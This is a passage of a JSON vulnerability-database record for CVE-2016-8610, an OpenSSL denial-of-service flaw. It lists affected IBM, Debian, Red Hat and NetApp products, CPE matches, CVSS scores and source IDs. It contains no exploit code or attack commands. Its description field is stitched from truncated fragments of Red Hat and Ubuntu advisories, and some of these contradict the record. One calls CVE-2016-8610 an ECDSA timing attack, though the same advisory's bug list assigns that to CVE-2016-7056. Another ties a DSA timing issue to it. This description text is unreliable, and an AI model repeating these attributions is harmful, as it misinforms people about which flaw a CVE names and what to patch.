"scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.8" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.6" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.5" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.4" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.3" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.2" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.10" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.1" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.0" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.9" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.8" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.7" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.6" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.5" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.13" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.12" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.11" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.10" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.0" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.9" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.8" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.16" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.15" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.14" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.13" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.12" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.11" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.10" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "6" }, { "model": "pan-os", "scope": "ne", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.0.16" }, { "model": "project openssl 1.1.0b", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.2j", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sterling connect:direct for unix 4.1.0.4.ifix085", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "netezza host management", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.4.9.0" }, { "model": "datapower gateways", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.5.2.2" }, { "model": "datapower gateways", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.5.1.4" }, { "model": "datapower gateways", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.5" }, { "model": "datapower gateways", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.11" }, { "model": "datapower gateways", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.14" }, { "model": "datapower gateways", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.17" } ], "sources": [ { "db": "BID", "id": "93841" }, { "db": "JVNDB", "id": "JVNDB-2016-008860" }, { "db": "CNNVD", "id": "CNNVD-201610-726" }, { "db": "NVD", "id": "CVE-2016-8610" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.1.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.0.2h", "versionStartIncluding": "1.0.2", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:redhat:jboss_enterprise_application_platform:6.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:redhat:jboss_enterprise_application_platform:6.4.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netapp:cn1610_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netapp:cn1610:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "11.40", "versionStartIncluding": "11.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:storagegrid_webscale:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:data_ontap_edge:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:oncommand_balance:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:snapdrive:-:*:*:*:*:unix:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:ontap_select_deploy:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:oncommand_workflow_automation:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:storagegrid:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:snapcenter_server:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:netapp:clustered_data_ontap:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:service_processor:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:oncommand_unified_manager:-:*:*:*:*:7-mode:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:data_ontap:-:*:*:*:*:7-mode:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:smi-s_provider:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:host_agent:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:clustered_data_ontap_antivirus_connector:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2016-8610" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Shi Lei from Gear Team, Qihoo 360 Inc.", "sources": [ { "db": "BID", "id": "93841" }, { "db": "CNNVD", "id": "CNNVD-201610-726" } ], "trust": 0.9 }, "cve": "CVE-2016-8610", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 5.0, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2016-8610", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "VHN-97430", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "exploitabilityScore": 3.9, "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 7.5, "baseSeverity": "High", "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2016-8610", "impactScore": null, "integrityImpact": "None", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2016-8610", "trust": 1.8, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201610-726", "trust": 0.6, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-97430", "trust": 0.1, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2016-8610", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-97430" }, { "db": "VULMON", "id": "CVE-2016-8610" }, { "db": "JVNDB", "id": "JVNDB-2016-008860" }, { "db": "CNNVD", "id": "CNNVD-201610-726" }, { "db": "NVD", "id": "CVE-2016-8610" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "A denial of service flaw was found in OpenSSL 0.9.8, 1.0.1, 1.0.2 through 1.0.2h, and 1.1.0 in the way the TLS/SSL protocol defined processing of ALERT packets during a connection handshake. A remote attacker could use this flaw to make a TLS/SSL server consume an excessive amount of CPU and fail to accept connections from other clients. OpenSSL is prone to denial-of-service vulnerability. \nSuccessful exploitation of the issue will cause excessive memory or CPU resource consumption, resulting in a denial-of-service condition. It supports a variety of encryption algorithms, including symmetric ciphers, hash algorithms, security hashing algorithm, etc. The following versions are affected: OpenSSL version 0.9.8, version 1.0.1, versions 1.0.2 through 1.0.2h, version 1.1.0. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Service Pack 1 for RHEL 7\nAdvisory ID: RHSA-2017:1413-01\nProduct: Red Hat JBoss Core Services\nAdvisory URL: https://access.redhat.com/errata/RHSA-2017:1413\nIssue date: 2017-06-07\nCVE Names: CVE-2016-0736 CVE-2016-2161 CVE-2016-6304 \n CVE-2016-7056 CVE-2016-8610 CVE-2016-8740 \n CVE-2016-8743 \n=====================================================================\n\n1. Summary:\n\nAn update is now available for Red Hat JBoss Core Services on RHEL 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat JBoss Core Services on RHEL 7 Server - noarch, ppc64, x86_64\n\n3. Description:\n\nRed Hat JBoss Core Services is a set of supplementary software for Red Hat\nJBoss middleware products. This software, such as Apache HTTP Server, is\ncommon to multiple JBoss middleware products, and is packaged under Red Hat\nJBoss Core Services to allow for faster distribution of updates, and for a\nmore consistent update experience. \n\nThis release of Red Hat JBoss Core Services Apache HTTP Server 2.4.23\nService Pack 1 serves as a replacement for Red Hat JBoss Core Services\nApache HTTP Server 2.4.23, and includes bug fixes, which are documented in\nthe Release Notes document linked to in the References. \n\nSecurity Fix(es):\n\n* A memory leak flaw was found in the way OpenSSL handled TLS status\nrequest extension data during session renegotiation. A remote attacker\ncould cause a TLS server using OpenSSL to consume an excessive amount of\nmemory and, possibly, exit unexpectedly after exhausting all available\nmemory, if it enabled OCSP stapling support. (CVE-2016-6304)\n\n* It was discovered that the mod_session_crypto module of httpd did not use\nany mechanisms to verify integrity of the encrypted session data stored in\nthe user\u0027s browser. (CVE-2016-0736)\n\n* It was discovered that the mod_auth_digest module of httpd did not\nproperly check for memory allocation failures. (CVE-2016-2161)\n\n* A timing attack flaw was found in OpenSSL that could allow a malicious\nuser with local access to recover ECDSA P-256 private keys. \n(CVE-2016-8610)\n\n* It was discovered that the HTTP parser in httpd incorrectly allowed\ncertain characters not permitted by the HTTP protocol specification to\nappear unencoded in HTTP request headers. If httpd was used in conjunction\nwith a proxy or backend server that interpreted those characters\ndifferently, a remote attacker could possibly use this flaw to inject data\ninto HTTP responses, resulting in proxy cache poisoning. (CVE-2016-8743)\n\n* A vulnerability was found in httpd\u0027s handling of the LimitRequestFields\ndirective in mod_http2, affecting servers with HTTP/2 enabled. An attacker\ncould send crafted requests with headers larger than the server\u0027s available\nmemory, causing httpd to crash. (CVE-2016-8740)\n\nRed Hat would like to thank the OpenSSL project for reporting CVE-2016-6304\nand Shi Lei (Gear Team of Qihoo 360 Inc.) for reporting CVE-2016-8610. \nUpstream acknowledges Shi Lei (Gear Team of Qihoo 360 Inc.) as the original\nreporter of CVE-2016-6304. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nFor the update to take effect, all services linked to the OpenSSL library\nmust be restarted, or the system rebooted. After installing the updated\npackages, the httpd daemon will be restarted automatically. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1377600 - CVE-2016-6304 openssl: OCSP Status Request extension unbounded memory growth\n1384743 - CVE-2016-8610 SSL/TLS: Malformed plain-text ALERT packets could cause remote DoS\n1401528 - CVE-2016-8740 httpd: Incomplete handling of LimitRequestFields directive in mod_http2\n1406744 - CVE-2016-0736 httpd: Padding Oracle in Apache mod_session_crypto\n1406753 - CVE-2016-2161 httpd: DoS vulnerability in mod_auth_digest\n1406822 - CVE-2016-8743 httpd: Apache HTTP Request Parsing Whitespace Defects\n1412120 - CVE-2016-7056 openssl: ECDSA P-256 timing attack key recovery\n\n6. JIRA issues fixed (https://issues.jboss.org/):\n\nJBCS-319 - Errata for httpd 2.4.23 SP1 RHEL 7\n\n7. Package List:\n\nRed Hat JBoss Core Services on RHEL 7 Server:\n\nSource:\njbcs-httpd24-httpd-2.4.23-120.jbcs.el7.src.rpm\njbcs-httpd24-mod_security-2.9.1-19.GA.jbcs.el7.src.rpm\njbcs-httpd24-openssl-1.0.2h-13.jbcs.el7.src.rpm\n\nnoarch:\njbcs-httpd24-httpd-manual-2.4.23-120.jbcs.el7.noarch.rpm\n\nppc64:\njbcs-httpd24-httpd-2.4.23-120.jbcs.el7.ppc64.rpm\njbcs-httpd24-httpd-debuginfo-2.4.23-120.jbcs.el7.ppc64.rpm\njbcs-httpd24-httpd-devel-2.4.23-120.jbcs.el7.ppc64.rpm\njbcs-httpd24-httpd-libs-2.4.23-120.jbcs.el7.ppc64.rpm\njbcs-httpd24-httpd-selinux-2.4.23-120.jbcs.el7.ppc64.rpm\njbcs-httpd24-httpd-tools-2.4.23-120.jbcs.el7.ppc64.rpm\njbcs-httpd24-mod_ldap-2.4.23-120.jbcs.el7.ppc64.rpm\njbcs-httpd24-mod_proxy_html-2.4.23-120.jbcs.el7.ppc64.rpm\njbcs-httpd24-mod_security-2.9.1-19.GA.jbcs.el7.ppc64.rpm\njbcs-httpd24-mod_security-debuginfo-2.9.1-19.GA.jbcs.el7.ppc64.rpm\njbcs-httpd24-mod_session-2.4.23-120.jbcs.el7.ppc64.rpm\njbcs-httpd24-mod_ssl-2.4.23-120.jbcs.el7.ppc64.rpm\njbcs-httpd24-openssl-1.0.2h-13.jbcs.el7.ppc64.rpm\njbcs-httpd24-openssl-debuginfo-1.0.2h-13.jbcs.el7.ppc64.rpm\njbcs-httpd24-openssl-devel-1.0.2h-13.jbcs.el7.ppc64.rpm\njbcs-httpd24-openssl-libs-1.0.2h-13.jbcs.el7.ppc64.rpm\njbcs-httpd24-openssl-perl-1.0.2h-13.jbcs.el7.ppc64.rpm\njbcs-httpd24-openssl-static-1.0.2h-13.jbcs.el7.ppc64.rpm\n\nx86_64:\njbcs-httpd24-httpd-2.4.23-120.jbcs.el7.x86_64.rpm\njbcs-httpd24-httpd-debuginfo-2.4.23-120.jbcs.el7.x86_64.rpm\njbcs-httpd24-httpd-devel-2.4.23-120.jbcs.el7.x86_64.rpm\njbcs-httpd24-httpd-libs-2.4.23-120.jbcs.el7.x86_64.rpm\njbcs-httpd24-httpd-selinux-2.4.23-120.jbcs.el7.x86_64.rpm\njbcs-httpd24-httpd-tools-2.4.23-120.jbcs.el7.x86_64.rpm\njbcs-httpd24-mod_ldap-2.4.23-120.jbcs.el7.x86_64.rpm\njbcs-httpd24-mod_proxy_html-2.4.23-120.jbcs.el7.x86_64.rpm\njbcs-httpd24-mod_security-2.9.1-19.GA.jbcs.el7.x86_64.rpm\njbcs-httpd24-mod_security-debuginfo-2.9.1-19.GA.jbcs.el7.x86_64.rpm\njbcs-httpd24-mod_session-2.4.23-120.jbcs.el7.x86_64.rpm\njbcs-httpd24-mod_ssl-2.4.23-120.jbcs.el7.x86_64.rpm\njbcs-httpd24-openssl-1.0.2h-13.jbcs.el7.x86_64.rpm\njbcs-httpd24-openssl-debuginfo-1.0.2h-13.jbcs.el7.x86_64.rpm\njbcs-httpd24-openssl-devel-1.0.2h-13.jbcs.el7.x86_64.rpm\njbcs-httpd24-openssl-libs-1.0.2h-13.jbcs.el7.x86_64.rpm\njbcs-httpd24-openssl-perl-1.0.2h-13.jbcs.el7.x86_64.rpm\njbcs-httpd24-openssl-static-1.0.2h-13.jbcs.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n8. References:\n\nhttps://access.redhat.com/security/cve/CVE-2016-0736\nhttps://access.redhat.com/security/cve/CVE-2016-2161\nhttps://access.redhat.com/security/cve/CVE-2016-6304\nhttps://access.redhat.com/security/cve/CVE-2016-7056\nhttps://access.redhat.com/security/cve/CVE-2016-8610\nhttps://access.redhat.com/security/cve/CVE-2016-8740\nhttps://access.redhat.com/security/cve/CVE-2016-8743\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/documentation/en/red-hat-jboss-core-services/\n\n9. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2017 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFZOEFDXlSAg2UNWIIRAkmJAJ4vtOF2J+v5N45Dg4fckgqFa+L96wCfVBp2\nJFT0GtD56HPD72nOXhIXyG8=\n=7n2G\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and\nTransport Layer Security (TLS) protocols, as well as a full-strength\ngeneral-purpose cryptography library. \n\nApache Tomcat is a servlet container for the Java Servlet and JavaServer\nPages (JSP) technologies. The updates are documented in the Release Notes document\nlinked to in the References. If sendfile processing completed quickly, it was\npossible for the Processor to be added to the processor cache twice. This\ncould lead to invalid responses or information disclosure. (CVE-2017-5647)\n\n* A vulnerability was discovered in the error page mechanism in Tomcat\u0027s\nDefaultServlet implementation. A crafted HTTP request could cause undesired\nside effects, possibly including the removal or replacement of the custom\nerror page. Solution:\n\nBefore applying the update, back up your existing Red Hat JBoss Web Server\ninstallation (including all applications and configuration files). \n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). \n\nThis release includes bug fixes as well as a new release of OpenSSL. The JBoss server process must be restarted for the update\nto take effect. (CVE-2016-6304)\n\n* It was discovered that OpenSSL did not always use constant time\noperations when computing Digital Signature Algorithm (DSA) signatures. \n(CVE-2016-8610)\n\n* Multiple integer overflow flaws were found in the way OpenSSL performed\npointer arithmetic. \n===========================================================================\nUbuntu Security Notice USN-3181-1\nJanuary 31, 2017\n\nopenssl vulnerabilities\n===========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 16.10\n- Ubuntu 16.04 LTS\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in OpenSSL. This\nissue only applied to Ubuntu 12.04 LTS and Ubuntu 14.04 LTS as other\nreleases were fixed in a previous security update. (CVE-2016-2177)\n\nIt was discovered that OpenSSL did not properly handle Montgomery\nmultiplication, resulting in incorrect results leading to transient\nfailures. This issue only applied to Ubuntu 16.04 LTS, and Ubuntu 16.10. This issue only applied to Ubuntu 12.04 LTS and Ubuntu 14.04\nLTS. (CVE-2016-7056)\n\nShi Lei discovered that OpenSSL incorrectly handled certain warning alerts. (CVE-2016-8610)\n\nRobert =C5=9Awi=C4=99cki discovered that OpenSSL incorrectly handled certain\ntruncated packets. (CVE-2017-3731)\n\nIt was discovered that OpenSSL incorrectly performed the x86_64 Montgomery\nsquaring procedure. This issue only applied to Ubuntu 16.04\nLTS, and Ubuntu 16.10. (CVE-2017-3732)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 16.10:\n libssl1.0.0 1.0.2g-1ubuntu9.1\n\nUbuntu 16.04 LTS:\n libssl1.0.0 1.0.2g-1ubuntu4.6\n\nUbuntu 14.04 LTS:\n libssl1.0.0 1.0.1f-1ubuntu2.22\n\nUbuntu 12.04 LTS:\n libssl1.0.0 1.0.1-4ubuntu5.39\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes", "sources": [ { "db": "NVD", "id": "CVE-2016-8610" }, { "db": "JVNDB", "id": "JVNDB-2016-008860" }, { "db": "BID", "id": "93841" }, { "db": "VULHUB", "id": "VHN-97430" }, { "db": "VULMON", "id": "CVE-2016-8610" }, { "db": "PACKETSTORM", "id": "142848" }, { "db": "PACKETSTORM", "id": "143874" }, { "db": "PACKETSTORM", "id": "142847" }, { "db": "PACKETSTORM", "id": "143176" }, { "db": "PACKETSTORM", "id": "143873" }, { "db": "PACKETSTORM", "id": "143181" }, { "db": "PACKETSTORM", "id": "140850" } ], "trust": 2.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2016-8610", "trust": 4.4 }, { "db": "BID", "id": "93841", "trust": 2.1 }, { "db": 